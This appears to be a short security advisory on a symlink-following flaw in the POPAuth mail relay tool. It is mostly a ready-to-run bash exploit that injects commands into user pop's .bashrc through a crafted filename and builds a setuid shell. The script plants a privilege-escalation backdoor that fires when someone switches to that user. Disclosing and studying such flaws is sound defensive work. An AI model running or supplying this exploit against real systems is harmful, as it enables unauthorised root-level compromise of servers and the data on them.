|
|
|
|
| |
| POPAuth is part of the POP before SMTP scheme, the scheme would allow you to restrict relaying through your mail server to only local users that have authenticated using Post Office Protocol. A security vulnerability in the product allows attackers to create a setuid shell with root privileges, allowing system wide compromising of system security. |
| |
Credit:
The information has been provided by Paul Starzetz.
|
| |
Impact:
In case of suid POPAuth and valid shell for user 'pop', the attached script will create suid-pop shell, if someone su to 'pop'. This may happen as a part of some automated check script (startup script).
Exploit:
#!/bin/bash
# popauth symlink follow vuln by IhaQueR
# this will create .bashrc for user pop
# and ~pop/sup suid shell
FILE=$(perl -e 'print "/tmp/blah1\"\ncd ~\necho >blah.c \" #include <stdio.h>\n main(){setreuid(geteuid(),getuid());execlp(\\\"bash\\\", \\\"bash\\\",NULL);}\"\ngcc blah.c -o sup\nchmod u+s sup\necho done\n\n\""')
ln -s /var/lib/pop/.bashrc "$FILE"
/usr/sbin/popauth -trace "$FILE"
|
|
|
|
|
